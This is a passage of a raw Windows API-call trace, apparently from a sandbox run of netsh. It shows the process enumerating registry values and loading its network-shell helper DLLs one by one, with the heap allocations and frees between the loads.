0x188e70 [0125.948] GetProcessHeap () returned 0x150000 [0125.948] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x185550 [0125.948] GetProcessHeap () returned 0x150000 [0125.948] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x185570 [0125.948] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0125.948] GetProcessHeap () returned 0x150000 [0125.948] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x182db0 | out: hHeap=0x150000) returned 1 [0125.948] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fef3ee0000 [0125.962] GetProcAddress (hModule=0x7fef3ee0000, lpProcName="InitHelperDll") returned 0x7fef3ee1c24 [0125.962] InitHelperDll () returned 0x0 [0125.962] RegisterHelper () returned 0x0 [0125.962] GetProcessHeap () returned 0x150000 [0125.962] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x3c8) returned 0x188f70 [0125.962] GetProcessHeap () returned 0x150000 [0125.962] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188af0 | out: hHeap=0x150000) returned 1 [0125.962] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="fwcfg", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0125.962] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0125.962] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0125.962] GetProcessHeap () returned 0x150000 [0125.962] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x118) returned 0x187d80 [0125.962] GetProcessHeap () returned 0x150000 [0125.962] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc) returned 0x185590 [0125.962] GetProcessHeap () returned 0x150000 [0125.962] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x14) returned 0x1855b0 [0125.962] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0125.963] GetProcessHeap () returned 0x150000 [0125.963] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188e70 | out: hHeap=0x150000) returned 1 [0125.963] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef3630000 [0125.972] GetProcAddress (hModule=0x7fef3630000, lpProcName="InitHelperDll") returned 0x7fef3632d20 [0125.972] InitHelperDll () returned 0x0 [0125.972] RegisterHelper () returned 0x0 [0125.972] GetProcessHeap () returned 0x150000 [0125.972] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x420) returned 0x188af0 [0125.973] GetProcessHeap () returned 0x150000 [0125.973] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188f70 | out: hHeap=0x150000) returned 1 [0125.973] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="authfwcfg", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0125.973] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0125.973] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0125.973] GetProcessHeap () returned 0x150000 [0125.973] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x140) returned 0x188f20 [0125.973] GetProcessHeap () returned 0x150000 [0125.973] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x14) returned 0x1855f0 [0125.973] GetProcessHeap () returned 0x150000 [0125.973] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1c) returned 0x188670 [0125.973] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0125.973] GetProcessHeap () returned 0x150000 [0125.973] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x187d80 | out: hHeap=0x150000) returned 1 [0125.973] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef35b0000 [0125.999] GetProcAddress (hModule=0x7fef35b0000, lpProcName="InitHelperDll") returned 0x7fef35b5d20 [0126.000] InitHelperDll () returned 0x0 [0126.003] RegisterHelper () returned 0x0 [0126.003] GetProcessHeap () returned 0x150000 [0126.003] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x478) returned 0x1907d0 [0126.003] GetProcessHeap () returned 0x150000 [0126.003] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188af0 | out: hHeap=0x150000) returned 1 [0126.003] RegisterHelper () returned 0x0 [0126.003] GetProcessHeap () returned 0x150000 [0126.003] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x4d0) returned 0x190c50 [0126.003] GetProcessHeap () returned 0x150000 [0126.003] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1907d0 | out: hHeap=0x150000) returned 1 [0126.003] RegisterHelper () returned 0x0 [0126.003] GetProcessHeap () returned 0x150000 [0126.003] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x528) returned 0x191130 [0126.004] GetProcessHeap () returned 0x150000 [0126.004] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x190c50 | out: hHeap=0x150000) returned 1 [0126.004] RegisterHelper () returned 0x0 [0126.004] GetProcessHeap () returned 0x150000 [0126.004] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x580) returned 0x1907d0 [0126.004] GetProcessHeap () returned 0x150000 [0126.004] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x191130 | out: hHeap=0x150000) returned 1 [0126.004] RegisterHelper () returned 0x0 [0126.004] GetProcessHeap () returned 0x150000 [0126.004] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x5d8) returned 0x190d60 [0126.004] GetProcessHeap () returned 0x150000 [0126.004] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1907d0 | out: hHeap=0x150000) returned 1 [0126.004] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="2", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0126.004] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0126.004] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0126.004] GetProcessHeap () returned 0x150000 [0126.004] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x168) returned 0x189070 [0126.004] GetProcessHeap () returned 0x150000 [0126.004] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x4) returned 0x178bb0 [0126.004] GetProcessHeap () returned 0x150000 [0126.004] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x14) returned 0x190200 [0126.004] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0126.004] GetProcessHeap () returned 0x150000 [0126.004] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188f20 | out: hHeap=0x150000) returned 1 [0126.004] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef3ec0000 [0126.019] GetProcAddress (hModule=0x7fef3ec0000, lpProcName="InitHelperDll") returned 0x7fef3ec1924 [0126.019] InitHelperDll () returned 0x0 [0126.019] RegisterHelper () returned 0x0 [0126.019] GetProcessHeap () returned 0x150000 [0126.019] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x630) returned 0x192c10 [0126.019] GetProcessHeap () returned 0x150000 [0126.019] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x190d60 | out: hHeap=0x150000) returned 1 [0126.019] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="netiohlp", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0126.020] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0126.020] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0126.020] GetProcessHeap () returned 0x150000 [0126.020] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x190) returned 0x188af0 [0126.020] GetProcessHeap () returned 0x150000 [0126.020] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x12) returned 0x190320 [0126.020] GetProcessHeap () returned 0x150000 [0126.020] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x191a00 [0126.020] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0126.020] GetProcessHeap () returned 0x150000 [0126.020] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x189070 | out: hHeap=0x150000) returned 1 [0126.020] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef3550000 [0126.032] GetProcAddress (hModule=0x7fef3550000, lpProcName="InitHelperDll") returned 0x7fef356ce30 [0126.032] InitHelperDll () returned 0x0 [0126.032] RegisterHelper () returned 0x0 [0126.032] GetProcessHeap () returned 0x150000 [0126.032] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x688) returned 0x188c90 [0126.032] GetProcessHeap () returned 0x150000 [0126.032] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x192c10 | out: hHeap=0x150000) returned 1 [0126.032] RegisterHelper () returned 0x0 [0126.032] GetProcessHeap () returned 0x150000 [0126.032] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x6e0) returned 0x192c10 [0126.032] GetProcessHeap () returned 0x150000 [0126.032] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188c90 | out: hHeap=0x150000) returned 1 [0126.032] RegisterHelper () returned 0x0 [0126.032] GetProcessHeap () returned 0x150000 [0126.032] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x738) returned 0x193300 [0126.033] GetProcessHeap () returned 0x150000 [0126.033] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x192c10 | out: hHeap=0x150000) returned 1 [0126.033] RegisterHelper () returned 0x0 [0126.033] GetProcessHeap () returned 0x150000 [0126.033] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x790) returned 0x193a40 [0126.033] GetProcessHeap () returned 0x150000 [0126.033] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x193300 | out: hHeap=0x150000) returned 1 [0126.033] RegisterHelper () returned 0x0 [0126.033] GetProcessHeap () returned 0x150000 [0126.033] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x7e8) returned 0x1941e0 [0126.033] GetProcessHeap () returned 0x150000 [0126.033] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x193a40 | out: hHeap=0x150000) returned 1 [0126.033] RegisterHelper () returned 0x0 [0126.033] GetProcessHeap () returned 0x150000 [0126.033] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x840) returned 0x192c10 [0126.033] GetProcessHeap () returned 0x150000 [0126.033] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1941e0 | out: hHeap=0x150000) returned 1 [0126.033] RegisterHelper () returned 0x0 [0126.033] GetProcessHeap () returned 0x150000 [0126.033] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x898) returned 0x193460 [0126.034] GetProcessHeap () returned 0x150000 [0126.034] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x192c10 | out: hHeap=0x150000) returned 1 [0126.034] RegisterHelper () returned 0x0 [0126.034] GetProcessHeap () returned 0x150000 [0126.034] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8f0) returned 0x193d00 [0126.034] GetProcessHeap () returned 0x150000 [0126.034] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x193460 | out: hHeap=0x150000) returned 1 [0126.034] RegisterHelper () returned 0x0 [0126.034] GetProcessHeap () returned 0x150000 [0126.034] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x948) returned 0x194600 [0126.034] GetProcessHeap () returned 0x150000 [0126.034] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x193d00 | out: hHeap=0x150000) returned 1 [0126.034] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="whhelper", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0126.034] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0126.034] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0126.034] GetProcessHeap () returned 0x150000 [0126.034] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1b8) returned 0x190fd0 [0126.034] GetProcessHeap () returned 0x150000 [0126.034] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x12) returned 0x190360 [0126.034] GetProcessHeap () returned 0x150000 [0126.034] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x190b60 [0126.034] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0126.035] GetProcessHeap () returned 0x150000 [0126.035] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188af0 | out: hHeap=0x150000) returned 1 [0126.035] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef3540000 [0126.044] GetProcAddress (hModule=0x7fef3540000, lpProcName="InitHelperDll") returned 0x7fef354210c [0126.044] InitHelperDll () returned 0x0 [0126.044] RegisterHelper () returned 0x0 [0126.044] GetProcessHeap () returned 0x150000 [0126.044] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x9a0) returned 0x193c10 [0126.044] GetProcessHeap () returned 0x150000 [0126.044] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x194600 | out: hHeap=0x150000) returned 1 [0126.044] RegEnumValueW (in: hKey=0x90, dwIndex=0xa, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="hnetmon", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0126.044] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0126.044] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0126.044] GetProcessHeap () returned 0x150000 [0126.045] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1e0) returned 0x188af0 [0126.045] GetProcessHeap () returned 0x150000 [0126.045] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x190380 [0126.045] GetProcessHeap () returned 0x150000 [0126.045] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x1903a0 [0126.045] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0126.045] GetProcessHeap () returned 0x150000 [0126.045] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x190fd0 | out: hHeap=0x150000) returned 1 [0126.045] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef3530000 [0126.062] GetProcAddress (hModule=0x7fef3530000, lpProcName="InitHelperDll") returned 0x7fef35322a4 [0126.062] InitHelperDll () returned 0x0 [0126.062] RegisterHelper () returned 0x0 [0126.062] GetProcessHeap () returned 0x150000 [0126.062] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x9f8) returned 0x194dc0 [0126.063] GetProcessHeap () returned 0x150000 [0126.063] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x193c10 | out: hHeap=0x150000) returned 1 [0126.063] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="rpc", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0126.063] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0126.063] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0126.063] GetProcessHeap () returned 0x150000 [0126.063] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x208) returned 0x188ce0 [0126.063] GetProcessHeap () returned 0x150000 [0126.063] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x8) returned 0x191300 [0126.063] GetProcessHeap () returned 0x150000 [0126.063] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x16) returned 0x190420 [0126.063] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0126.063] GetProcessHeap () returned 0x150000 [0126.063] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188af0 | out: hHeap=0x150000) returned 1 [0126.063] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef3520000 [0126.069] GetProcAddress (hModule=0x7fef3520000, lpProcName="InitHelperDll") returned 0x7fef3522e88 [0126.069] InitHelperDll () returned 0x0 [0126.069] RegisterHelper () returned 0x0 [0126.069] GetProcessHeap () returned 0x150000 [0126.069] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xa50) returned 0x1957c0 [0126.069] GetProcessHeap () returned 0x150000 [0126.069] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x194dc0 | out: hHeap=0x150000) returned 1 [0126.069] RegisterHelper () returned 0x0 [0126.069] GetProcessHeap () returned 0x150000 [0126.069] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xaa8) returned 0x196220 [0126.069] GetProcessHeap () returned 0x150000 [0126.069] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1957c0 | out: hHeap=0x150000) returned 1 [0126.069] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="dot3cfg", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0126.069] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0126.069] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0126.069] GetProcessHeap () returned 0x150000 [0126.069] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x230) returned 0x196cd0 [0126.069] GetProcessHeap () returned 0x150000 [0126.069] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x190440 [0126.069] GetProcessHeap () returned 0x150000 [0126.069] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x18) returned 0x190460 [0126.069] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0126.070] GetProcessHeap () returned 0x150000 [0126.070] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x188ce0 | out: hHeap=0x150000) returned 1 [0126.070] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef3500000 [0126.083] GetProcAddress (hModule=0x7fef3500000, lpProcName="InitHelperDll") returned 0x7fef350390c [0126.083] InitHelperDll () returned 0x0 [0126.083] RegisterHelper () returned 0x0 [0126.083] GetProcessHeap () returned 0x150000 [0126.083] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xb00) returned 0x196f10 [0126.083] GetProcessHeap () returned 0x150000 [0126.083] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x196220 | out: hHeap=0x150000) returned 1 [0126.083] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="napmontr", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0126.083] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0126.083] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0126.083] GetProcessHeap () returned 0x150000 [0126.083] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x258) returned 0x197a20 [0126.084] GetProcessHeap () returned 0x150000 [0126.084] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x12) returned 0x190500 [0126.084] GetProcessHeap () returned 0x150000 [0126.084] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x188f10 [0126.084] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0126.084] GetProcessHeap () returned 0x150000 [0126.084] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x196cd0 | out: hHeap=0x150000) returned 1 [0126.084] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef33f0000 [0126.095] GetProcAddress (hModule=0x7fef33f0000, lpProcName="InitHelperDll") returned 0x7fef340048c [0126.095] InitHelperDll () returned 0x0 [0126.095] RegisterHelper () returned 0x0 [0126.095] GetProcessHeap () returned 0x150000 [0126.095] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xb58) returned 0x1961d0 [0126.095] GetProcessHeap () returned 0x150000 [0126.095] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x196f10 | out: hHeap=0x150000) returned 1 [0126.095] RegisterHelper () returned 0x0 [0126.095] GetProcessHeap () returned 0x150000 [0126.095] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xbb0) returned 0x196d30 [0126.095] GetProcessHeap () returned 0x150000 [0126.095] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1961d0 | out: hHeap=0x150000) returned 1 [0126.095] RegisterHelper () returned 0x0 [0126.095] GetProcessHeap () returned 0x150000 [0126.095] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc08) returned 0x197f60 [0126.095] GetProcessHeap () returned 0x150000 [0126.095] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x196d30 | out: hHeap=0x150000) returned 1 [0126.095] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="nshipsec", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0126.096] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0126.096] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0126.096] GetProcessHeap () returned 0x150000 [0126.096] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x280) returned 0x198b70 [0126.096] GetProcessHeap () returned 0x150000 [0126.096] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x12) returned 0x1905c0 [0126.096] GetProcessHeap () returned 0x150000 [0126.096] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x194000 [0126.096] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0126.096] GetProcessHeap () returned 0x150000 [0126.096] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x197a20 | out: hHeap=0x150000) returned 1 [0126.096] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x7fef32f0000 [0132.088] GetProcAddress (hModule=0x7fef32f0000, lpProcName="InitHelperDll") returned 0x7fef32f6230 [0132.088] InitHelperDll () returned 0x0 [0132.088] RegisterHelper () returned 0x0 [0132.088] GetProcessHeap () returned 0x150000 [0132.088] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xc60) returned 0x19be00 [0132.089] GetProcessHeap () returned 0x150000 [0132.089] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x197f60 | out: hHeap=0x150000) returned 1 [0132.089] RegisterHelper () returned 0x0 [0132.089] GetProcessHeap () returned 0x150000 [0132.089] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xcb8) returned 0x19ca70 [0132.089] GetProcessHeap () returned 0x150000 [0132.089] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19be00 | out: hHeap=0x150000) returned 1 [0132.089] RegisterHelper () returned 0x0 [0132.089] GetProcessHeap () returned 0x150000 [0132.089] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xd10) returned 0x19d730 [0132.090] GetProcessHeap () returned 0x150000 [0132.090] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19ca70 | out: hHeap=0x150000) returned 1 [0133.700] RegEnumValueW (in: hKey=0x90, dwIndex=0xf, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="nettrace", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0133.700] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0133.700] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0133.700] GetProcessHeap () returned 0x150000 [0133.700] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x2a8) returned 0x197f60 [0133.701] GetProcessHeap () returned 0x150000 [0133.701] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x12) returned 0x1907a0 [0133.701] GetProcessHeap () returned 0x150000 [0133.701] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x197530 [0133.701] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0133.701] GetProcessHeap () returned 0x150000 [0133.701] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x198b70 | out: hHeap=0x150000) returned 1 [0133.701] LoadLibraryW (lpLibFileName="NETTRACE.DLL") returned 0x7fef3af0000 [0142.681] GetProcAddress (hModule=0x7fef3af0000, lpProcName="InitHelperDll") returned 0x7fef3b37360 [0142.681] InitHelperDll () returned 0x0 [0142.681] RegisterHelper () returned 0x0 [0142.681] GetProcessHeap () returned 0x150000 [0142.681] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xd68) returned 0x1a2600 [0142.681] GetProcessHeap () returned 0x150000 [0142.681] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19d730 | out: hHeap=0x150000) returned 1 [0142.681] RegEnumValueW (in: hKey=0x90, dwIndex=0x10, lpValueName=0x174260, lpcchValueName=0x147720, lpReserved=0x0, lpType=0x0, lpData=0x16e070, lpcbData=0x147768 | out: lpValueName="WcnNetsh", lpcchValueName=0x147720, lpType=0x0, lpData=0x16e070, lpcbData=0x147768) returned 0x0 [0142.681] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0142.681] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0142.681] GetProcessHeap () returned 0x150000 [0142.681] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x2d0) returned 0x1a3370 [0142.681] GetProcessHeap () returned 0x150000 [0142.681] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x12) returned 0x1906a0 [0142.681] GetProcessHeap () returned 0x150000 [0142.681] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x1a) returned 0x1a2520 [0142.681] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0142.681] GetProcessHeap () returned 0x150000 [0142.681] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x197f60 | out: hHeap=0x150000) returned 1 [0142.681] LoadLibraryW (lpLibFileName="WCNNETSH.DLL") returned 0x7fef41c0000 [0143.162] GetProcAddress (hModule=0x7fef41c0000, lpProcName="InitHelperDll") returned 0x7fef41c28e4 [0143.162] InitHelperDll () returned 0x0 [0143.162] RegisterHelper () returned 0x0 [0143.162] GetProcessHeap () returned 0x150000 [0143.162] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0xdc0) returned 0x1a4e50 [0143.162] GetProcessHeap () returned 0x150000 [0143.162] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1a2600 | out: hHeap=0x150000) returned 1 [0143.163] RegEnumValueW (in: hKey=0x90, dwIndex=0x11, 